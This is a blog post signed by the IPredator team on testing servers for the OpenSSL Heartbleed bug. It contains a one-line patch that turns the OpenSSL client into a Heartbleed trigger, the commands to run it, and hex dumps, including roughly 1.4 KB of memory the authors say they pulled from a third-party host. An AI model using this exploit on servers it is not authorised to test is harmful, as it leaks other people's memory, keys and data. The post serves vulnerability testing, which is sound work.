How to test if your OpenSSL heartbleeds

Hello,

yesterday the OpenSSL team released a new version of OpenSSL to address a serious security issue that might leak sensitive data to anyone who is able to connect to your SSL services (if you are running OpenSSL version 1.0.1). The website heartbleed.com has a nice writeup of the consequences this bug might have. If you are looking for more technical in-depth content check out this blog post or this archive message for the original commit of the OpenSSL code in question.

Patching OpenSSL

While patches for most distributions are already out, we found no instructions on how to test that the fixes are working once you have them installed. Of course you did restart your services after you installed the patches right?

The easiest way to test for the vulnerability is to use the OpenSSL command line client. It has all the functionality needed already build-in so adapting it to our needs is quite simple. Grab a copy of the previous OpenSSL version for example 1.0.1f.

Looking at the code in question we can see that the function tls1_heartbeat(SSL *s) is the one we are looking for. The heartbeat message constructed by OpenSSL looks as follows (comment taken from the OpenSSL code that is not our typo in the comment :)):

/* Create HeartBeat message, we just use a sequence number
 * as payload to distuingish different messages and add   
 * some random stuff.
 *  - Message Type, 1 byte
 *  - Payload Length, 2 bytes (unsigned int)
 *  - Payload, the sequence number (2 bytes uint)
 *  - Payload, random bytes (16 bytes uint)
 *  - Padding
 */

In order to trigger the bug we simply need to adjust the payload length to a bigger size. OpenSSL will happily comply and return some "memory junk" for us on systems that are not yet patched. The following one liner is all that needs to be changed to trigger the bug:

--- ssl/t1_lib.c.orig   2014-01-06 13:47:42.000000000 +0000
+++ ssl/t1_lib.c    2014-04-08 03:19:59.244054532 +0000
@@ -2669,5 +2669,6 @@
    *p++ = TLS1_HB_REQUEST;
    /* Payload length (18 bytes here) */
-   s2n(payload, p);
+   /* Feel free to bump up the size ... */
+   s2n(1337, p);
    /* Sequence number */
    s2n(s->tlsext_hb_seq, p);

Once that is done all you need to do is to compile your special version of OpenSSL. If you are unsure on how to compile OpenSSL on your own, simply stuff the patch into whatever package management your distribution/Operating System of choice is using.

Testing

Equipped with your custom OpenSSL client binary and a non-patched version you can test for the existence of the bug as follows. Start the OpenSSL client with the arguments listed below and once the connection to the remote machine was established press B. This will initiate a heartbeat to the remote SSL server.

Testing a fixed host with non-patched OpenSSL client

$ /usr/local/bin/openssl s_client -connect ipredator.se:443 -tlsextdebug -debug -state

Enter B

HEARTBEATING
write to 0x801c17160 [0x801cbc003] (66 bytes => 66 (0x42))
0000 - 18 03 03 00 3d 8f 6f 3c-52 11 83 20 9c a2 c0 49   ....=.o 5 (0x5))
0000 - 18 03 03 00 3d                                    ....=
read from 0x801c17160 [0x801cb7008] (61 bytes => 61 (0x3D))
0000 - 05 4d f5 c0 db 96 d1 f5-c7 07 e5 17 1f 3b 48 34   .M...........;H4
0010 - 6e 11 9d ba 10 0c 3a 34-eb 7b a5 7c c4 b6 c0 c0   n.....:4.{.|....
0020 - b0 75 0e fe b7 fa 9e 04-e9 4e 4a 7d 51 d3 11 1f   .u.......NJ}Q...
0030 - e2 23 16 77 cb a6 e1 8e-77 84 2b f8 7f            .#.w....w.+..
read R BLOCK

You will get a heartbeat response that looks similar to this one.

Testing a fixed host with the patched OpenSSL client

$ /opt/openssl/bin/openssl s_client -connect ipredator.se:443 -tlsextdebug -debug -state

Enter B

HEARTBEATING
write to 0x801818160 [0x8019d5803] (101 bytes => 101 (0x65))
0000 - 18 03 03 00 60 9c a3 1e-fc 3b 3f 1f 0e 3a fe 4c   ....`....;?..:.L
0010 - a9 33 08 cc 3d 43 54 75-44 7d 2c 7b f3 47 b9 56   .3..=CTuD},{.G.V
0020 - 89 37 c1 43 1c 80 7b 87-66 ff cb 55 5f 8d 1a 95   .7.C..{.f..U_...
0030 - 1b 4c 65 14 21 a1 95 ac-7a 70 79 fc cc a0 cf 51   .Le.!...zpy....Q
0040 - 0f 7e c5 56 14 c8 37 c1-40 0b b8 cb 43 96 8a e6   .~.V..7.@...C...
0050 - 21 42 64 58 62 15 fb 51-82 e6 7f ef 21 1b 6f 87   !BdXb..Q....!.o.
0060 - b9 c2 04 c8 47                                    ....G

The system does not respond to the heartbeat query anymore. OpenSSL can respond and terminate the session too. The behavior seems differ a bit between hosts.

Testing a vulnerable host with the patched OpenSSL client

So there are still quite a few targets to test out there. The SSL test from SSLLabs is a good resource. We did not spend a lot of time on looking for a suitable candidate. Of course we checked heartbleed.com as well. Interestingly they are not using a valid certificate at all and to our surprise we could still pull data from some of cloudfront machines. The SSL config on the cloudfront machines is also not quite state of the art ... no PFS at all and RC4 all over the place. Details here. You can find dumps of the OpenSSL test here short version, long version.

$ /opt/openssl/bin/openssl s_client -connect heartbleed.com:443 -tlsextdebug -debug -state

Enter B

B
HEARTBEATING
write to 0x801818160 [0x8019d5803] (58 bytes => 58 (0x3A))
0000 - 18 03 03 00 35 e1 79 2f-3e 25 85 88 4d d7 c8 d3   ....5.y/>%..M...
0010 - 82 6b f9 20 b3 bd 72 3c-1a 18 c6 16 ed 51 05 c7   .k. ..r<.....Q..
0020 - 52 95 f4 2d af 88 4e df-e9 30 76 d6 67 1c 8f 2d   R..-..N..0v.g..-
0030 - 3f 81 07 39 ee 4d c4 29-38 b5                     ?..9.M.)8.
read from 0x801818160 [0x8019d1003] (5 bytes => 5 (0x5))
0000 - 18 03 03 05 5c                                    ....\
read from 0x801818160 [0x8019d1008] (1372 bytes => 1372 (0x55C))
0000 - ee 21 a3 bf 5d 5e 9f e1-43 6f ff 7f 08 d4 e8 21   .!..]^..Co.....!
0010 - 55 f8 c5 a6 41 3a 1a ea-58 5d 2f 3a 81 36 6d 15   U...A:..X]/:.6m.
0020 - 91 36 49 6d e9 77 2b 41-39 2f 65 f0 91 5c 90 db   .6Im.w+A9/e..\..
0030 - 80 8e 78 b6 50 f8 8e 48-fc ea 8a 44 8e 8b e0 77   ..x.P..H...D...w
0040 - a7 1f 1d f1 cb 67 09 d3-ef 15 8f 75 f1 dd a6 b4   .....g.....u....
0050 - 4a 26 ec b9 66 b4 32 56-b5 59 a0 6a e9 67 d4 c6   J&..f.2V.Y.j.g..
0060 - 00 f1 54 1d 05 ad a9 05-e8 ac ae 6c bf 2f c5 d6   ..T........l./..
0070 - 6c 1a 56 9e 93 35 b1 d6-f2 bd d8 29 f1 77 64 28   l.V..5.....).wd(
0080 - e6 b5 e3 96 77 7d 55 d1-44 51 91 44 35 c9 3e 47   ....w}U.DQ.D5.>G
0090 - 86 0a 11 48 c9 5b 27 25-37 9d be 52 75 30 b2 f8   ...H.['%7..Ru0..
00a0 - 5f 89 5c 5a 92 13 8d 1b-90 34 1c 83 db e5 83 39   _.\Z.....4.....9
00b0 - b6 62 32 32 59 88 bf 1b-13 7e 42 70 59 fa 12 cb   .b22Y....~BpY...
00c0 - a0 cb 20 53 c3 d9 f7 8e-f8 eb c7 09 8d c9 ed b6   .. S............
00d0 - 95 da 73 68 fe 2d 86 21-f1 07 31 56 33 b2 3b 9c   ..sh.-.!..1V3.;.
00e0 - 18 15 33 07 5b 6b 4f 53-4d 58 1d a6 bd 88 28 14   ..3.[kOSMX....(.
00f0 - 29 9a 25 83 49 15 ea 4d-79 81 f7 60 ec 86 20 d4   ).%.I..My..`.. .
0100 - 44 31 7b 14 70 f1 c2 58-68 3e a6 35 76 da 1d f9   D1{.p..Xh>.5v...
0110 - 26 9b 79 2f ad 34 82 31-8f 7b 45 1a 4d e1 67 6c   &.y/.4.1.{E.M.gl
0120 - 39 9d ef 39 58 9f e5 c1-70 02 c9 5d 04 ee 89 48   9..9X...p..]...H
0130 - 25 39 c7 29 11 d0 b6 a9-f0 82 c5 8e 87 5d ef c1   %9.).........]..
0140 - a1 5a 67 d4 dc b5 04 f8-e0 65 be 9f 10 81 dd 6e   .Zg......e.....n
0150 - 43 4e 2c dc 44 64 f2 22-63 6d 0d 12 09 31 fb 38   CN,.Dd."cm...1.8
0160 - f5 22 21 68 6e 8a 5f 0e-50 4f 64 44 a9 2f 7e d9   ."!hn._.POdD./~.
0170 - 41 df f9 40 69 a4 ae 97-0e 68 41 79 44 45 a5 13   A..@i....hAyDE..
0180 - b9 21 ad ce c9 89 6c 3e-6d d7 6c b8 ef 2c b3 24   .!....l>m.l..,.$
0190 - a2 3b 8b 55 db 06 24 a1-06 80 cc 1b 48 61 53 73   .;.U..$.....HaSs
01a0 - 8f fc bb 43 c7 01 9e 3b-ba 91 d4 a2 24 37 4e 6d   ...C...;....$7Nm
01b0 - 05 cd a1 34 76 58 91 8f-1e 3b 85 7f 34 a3 a1 04   ...4vX...;..4...
01c0 - 9d 06 2d aa c5 f2 09 98-de ea 56 12 b5 5e 51 7f   ..-.......V..^Q.
01d0 - 30 df 47 22 c6 20 82 0c-a8 bf 37 67 f2 be f0 32   0.G". ....7g...2
01e0 - 28 39 34 f6 49 e5 ab 43-6e 60 6a 05 48 94 ca c8   (94.I..Cn`j.H...
01f0 - 4b 47 8f fe 10 57 13 75-60 83 f1 25 5c 70 ed c6   KG...W.u`..%\p..
0200 - 28 ef a8 95 65 46 6e b0-db 5e d7 70 7b e2 38 23   (...eFn..^.p{.8#
0210 - d8 e6 3a 07 7d d5 5a b9-3a 40 6c 74 e7 e0 c1 31   ..:.}.Z.:@lt...1
0220 - 34 ce 22 1f 2f 5e 30 b6-20 60 42 dc 12 9b 52 d4   4."./^0. `B...R.
0230 - b4 db d9 ad 7b b2 42 ae-d2 f6 0d dd 88 b0 b8 03   ....{.B.........
0240 - b8 7d c0 49 e6 8d 45 72-21 dc b9 0d dd 43 8e 1b   .}.I..Er!....C..
0250 - f5 75 74 1b 94 2a d5 50-ae cd 60 a5 7d 24 4b df   .ut..*.P..`.}$K.
0260 - 82 4d e8 3c c3 93 4b f6-cb f2 e8 13 ab f7 98 cf   .M.<..K.........
0270 - 1a a4 10 62 8e be 4a 04-52 f8 23 8d d4 11 68 0a   ...b..J.R.#...h.
0280 - 11 b8 79 93 43 91 00 3b-3b 65 3b f8 cd 12 9c f8   ..y.C..;;e;.....
0290 - 28 ed a3 e5 88 ee be 2d-df 5a ba bd a9 d2 93 4a   (......-.Z.....J
02a0 - cc 04 49 9d 42 ea 1c 82-be 66 4c 16 8d 6a 04 b9   ..I.B....fL..j..
02b0 - 37 04 e9 f5 0e b9 23 14-1c 44 c2 b8 f3 93 41 fd   7.....#..D....A.
02c0 - 66 df a4 ba ef 82 3b f8-6f bc 16 51 1c 3f 51 4c   f.....;.o..Q.?QL
02d0 - 0c 75 88 c5 fb 16 a2 76-d8 ab d8 83 c1 1b e1 60   .u.....v.......`
02e0 - 12 7a bf 32 ea fd 18 85-45 38 35 56 f9 01 12 1d   .z.2....E85V....
02f0 - 3d ac 48 42 d6 54 84 ea-51 36 55 1e 4e 87 13 4b   =.HB.T..Q6U.N..K
0300 - 85 cb c0 fb 89 a4 e9 2c-d8 76 04 52 f7 4b 8a 44   .......,.v.R.K.D
0310 - e9 ed 55 ba f9 9d 5f 3d-de 9e 08 ef ee 5c 0c cb   ..U..._=.....\..
0320 - 6f 81 db 67 40 78 9a 3c-db 15 3a 8a 48 3a 89 8a   o..g@x.<..:.H:..
0330 - f8 89 2a e2 96 77 09 22-b7 fc 5a 2a c7 52 f7 80   ..*..w."..Z*.R..
0340 - 40 3b 53 0c b7 3c 73 06-cb 54 8e 02 31 3e c4 2d   @;S...-
0350 - 9a 46 c9 bb 62 2a 71 16-8e 6d a2 bc 79 01 75 b6   .F..b*q..m..y.u.
0360 - f2 f2 1c b8 f1 05 e3 20-40 ae ff a4 30 c3 31 aa   ....... @...0.1.
0370 - 63 32 c7 16 32 76 19 7c-30 2a 51 8f 3c b6 5e 28   c2..2v.|0*Q.<.^(
0380 - 77 be 3f a4 96 81 af 5d-78 cf 40 a1 72 97 19 d5   w.?....]x.@.r...
0390 - d0 10 fe 8f 64 f0 dd 20-3c ac 57 a0 f8 68 5c b3   ....d.. <.W..h\.
03a0 - 73 d7 12 93 73 23 a6 9e-dd ba c8 72 25 d4 1c a9   s...s#.....r%...
03b0 - 28 8d 75 c7 8a 84 3f e0-d4 aa 03 de 0c 08 83 1e   (.u...?.........
03c0 - 51 a5 86 81 f7 3c f6 85-2e 2e f0 02 13 47 40 15   Q....<.......G@.
03d0 - 43 15 79 3d 9e 62 a4 f4-cc c0 d1 20 24 ea a2 7d   C.y=.b..... $..}
03e0 - f1 91 2d 65 1c e4 90 91-e5 fe 88 c0 01 70 3b b6   ..-e.........p;.
03f0 - 44 90 c9 a2 fa d5 94 5a-d4 18 4d 7c e0 57 b3 6b   D......Z..M|.W.k
0400 - 67 ea 75 a4 26 83 f5 12-54 40 0f 8c 55 9f 72 1f   g.u.&...T@..U.r.
0410 - 06 0a 05 56 9d 85 d5 98-dd fa b8 4d a1 ac b4 b1   ...V.......M....
0420 - 66 e7 25 2b 9e 28 8b f7-e6 9a cf 5c ac 81 cd e3   f.%+.(.....\....
0430 - e7 47 d5 25 cd 66 e4 c4-e4 48 90 11 84 af 86 8c   .G.%.f...H......
0440 - e6 c3 7f 61 e7 06 da e3-05 b9 18 5b f4 2d 3a c5   ...a.......[.-:.
0450 - e8 b5 83 be 6a 37 97 8f-05 0f a6 cf 47 56 fb dd   ....j7......GV..
0460 - 75 91 12 84 0b af c8 39-7d 8f be 6c 95 39 b2 f4   u......9}..l.9..
0470 - 53 50 38 4b 0a aa fa ae-44 fd b0 2e a0 02 65 c4   SP8K....D.....e.
0480 - c5 35 1b b1 e5 6b 25 ca-1b 07 db 77 ce 57 da 92   .5...k%....w.W..
0490 - 41 1a 8c 00 b7 27 f9 21-38 3c 22 e4 86 ee 0c 45   A....'.!8<"....E
04a0 - 0b af c6 d1 ee 6c 16 9b-d5 be 0e dd 1d 4b 04 95   .....l.......K..
04b0 - 93 9a 90 57 4f 5c ed 6b-17 2a ae 7e 6e f3 e5 a3   ...WO\.k.*.~n...
04c0 - 73 cb 81 d1 56 7a 31 54-2d 1a a7 8f 6a b3 1a 49   s...Vz1T-...j..I
04d0 - 4d 9c e6 89 af ea 74 9b-69 1d 07 01 ea 05 2c 6e   M.....t.i.....,n
04e0 - e2 bb 6c e4 bb d2 bf 8a-2f 8d a5 84 63 be 83 51   ..l...../...c..Q
04f0 - ff 70 fa ed c5 5b 39 92-29 8e a5 3e ef 95 fe 7e   .p...[9.)..>...~
0500 - 49 91 83 de 37 0b 3d 9b-ea 1b e5 27 a5 4c 81 57   I...7.=....'.L.W
0510 - 5f 7b 8a 5a 27 e2 da ca-ac 42 84 6c 55 94 60 98   _{.Z'....B.lU.`.
0520 - 78 62 b3 f4 be 57 02 c5-2b d8 0f 83 d7 2f 5f 16   xb...W..+..../_.
0530 - b0 83 10 5f 6a 83 e4 87-dd 43 59 c8 fd db 05 63   ..._j....CY....c
0540 - ca c3 c7 08 86 a4 1b 8f-7d b2 8d 86 8e 22 98 9b   ........}...."..
0550 - 0a 59 74 3d 24 9e 53 53-33 75 ba 7b               .Yt=$.SS3u.{
read R BLOCK

The IPredator team